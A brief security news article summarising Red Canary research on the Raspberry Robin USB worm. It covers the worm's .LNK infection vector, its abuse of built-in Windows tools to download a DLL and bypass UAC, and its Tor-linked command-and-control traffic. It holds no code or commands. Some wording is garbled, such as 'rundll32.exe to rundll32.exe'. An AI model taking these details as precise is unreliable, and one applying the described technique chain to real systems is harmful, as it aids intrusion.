New ‘Raspberry Robin’ Malware Spreading via External Drives
In attribution of the malware to a group dubbed “Raspberry Robin,” Red Canary researchers discovered that the malware “leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL.”
The first indications of the phenomenon are believed to date to September 2021. The first signs of the disease were found in companies with connections to the manufacturing and technology sectors.
Attack chains that are associated with Raspberry Robin start with connecting an infected USB drive to the Windows machine. The device contains the payload of the worm, which is an .LNK shortcut file that is attached to the legitimate folder.
The worm takes care of spawning a fresh process by using cmd.exe to open and run the malicious file that is stored within the hard drive.
Then, it launches explorer.exe and msiexec.exe which is the latter is used to enable external network communications to an unauthenticated domain for command-and-control (C2) purposes as well as in order to install and download an DLL library.
The dangerous DLL is loaded and executed by a series of legitimate Windows tools like fodhelper.exe, rundll32.exe to rundll32.exe and odbcconf.exe which effectively bypasses User Account Control (UAC).
Another feature common to Raspberry Robin detections is the presence of outbound C2 contact between three processes: regsvr32.exe, rundll32.exe, and dllhost.exe to IP addresses that are associated to Tor nodes.
However, the goals of the operators aren’t clear at the moment. It’s not clear how or exactly where external drives are affected It’s believed that the infection is carried out offline.
“We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers claimed. “One hypothesis is that it may be an attempt to establish persistence on an infected system.”
